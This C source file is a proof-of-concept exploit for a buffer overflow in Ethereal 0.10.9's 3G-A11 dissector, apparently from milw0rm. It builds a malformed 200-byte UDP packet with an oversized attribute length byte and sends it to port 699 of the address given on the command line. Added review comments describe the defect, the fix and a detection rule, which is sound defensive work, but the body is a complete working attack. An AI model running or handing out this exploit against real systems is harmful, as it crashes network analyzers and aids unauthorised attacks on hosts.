/*
 *
 * Ethereal 3G-A11 remote buffer overflow PoC exploit
 * --------------------------------------------------
 * Coded by Leon Juranic <ljuranic@lss.hr>
 * LSS Security <http://security.lss.hr/en/>
 *
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
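/*
 * Sends one 200-byte UDP datagram to port 699 of the IPv4 address in argv[1].
 *
 * Per the file header this is the proof of concept for a buffer overflow in
 * Ethereal's 3G-A11 dissector; the page footer names Ethereal 0.10.9 and
 * classes the impact as denial of service.  Its use to a defender is as a
 * regression input for a patched analyzer build and as sample traffic for
 * validating a detection rule.
 *
 * The bytes placed in the datagram are exactly those the original listing
 * writes.  What changed is build and runtime hygiene only: extraction
 * residue removed, explicit return type, argument and error checks, a zeroed
 * address structure, no type-punned stores, and the socket is closed.
 *
 * Returns 0 when the datagram was handed to the kernel, 1 on a usage or
 * socket error.
 *
 * NOTE(review): the field meanings given below (message type, extension
 * type/length, attribute type/length) are inferred from the 3G-A11 naming in
 * the header comment -- confirm against the dissector source before relying
 * on them in a signature.
 */
int main(int argc, char **argv)
{
    int sock;
    int rc = 0;
    struct sockaddr_in sin;
    unsigned char buf[1024];
    char bla[200];
    unsigned short field;

    /* The original dereferenced argv[1] unconditionally. */
    if (argc < 2) {
        fprintf(stderr, "usage: %s <ipv4-address>\n",
                argc > 0 ? argv[0] : "a11-poc");
        return 1;
    }

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    /* Zero first so sin_zero does not carry stack garbage. */
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    sin.sin_port = htons(699);

    /*
     * NOTE(review): buf is deliberately left uninitialised, as in the
     * original.  Offsets 21 and 24-27 are never written, so those bytes are
     * indeterminate and differ between runs; a capture-based signature must
     * not match on them.
     */
    buf[0] = 22;                    /* presumably the A11 message type */
    memset(buf + 1, 'A', 19);       /* filler for the rest of the fixed header */
    buf[20] = 38;                   /* presumably an extension type */

    /* Two-byte fields are stored via memcpy instead of a pointer cast. */
    field = htons(100);             /* big-endian 100: presumably extension length */
    memcpy(buf + 22, &field, sizeof field);
    field = 0x0101;                 /* 0x01 0x01 on the wire in either byte order */
    memcpy(buf + 28, &field, sizeof field);

    buf[30] = 31;                   /* presumably an attribute type */
    buf[31] = 150;                  /* author's comment: "len for overflow"; may need adjusting */

    /*
     * The one-byte length above is what the receiving parser presumably
     * trusts when it copies the attribute value.  The defect is therefore a
     * missing bounds check on the analyzer side; the remedy is a fixed
     * Ethereal release (the page names 0.10.9 as affected -- TODO confirm the
     * first fixed version from the vendor advisory) and not running the
     * analyzer with elevated privileges on untrusted traffic.
     */
    memset(bla, 'B', sizeof bla);
    /* bla holds no NUL, so this copies the same 180 bytes strncpy did. */
    memcpy(buf + 32, bla, 180);

    /*
     * Detection note: the 'A'/'B' filler identifies this exact PoC only.  A
     * durable rule keys on UDP/699 traffic from unexpected sources and on the
     * length byte at offset 31 rather than on the filler values.
     */
    if (sendto(sock, buf, 200, 0, (struct sockaddr *)&sin, sizeof sin) < 0) {
        perror("sendto");
        rc = 1;
    }

    close(sock);
    return rc;
}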
// milw0rm.com [2005-03-08]
Ethereal 0.10.9 Denial of Service
Leon Juranic
03/08/2005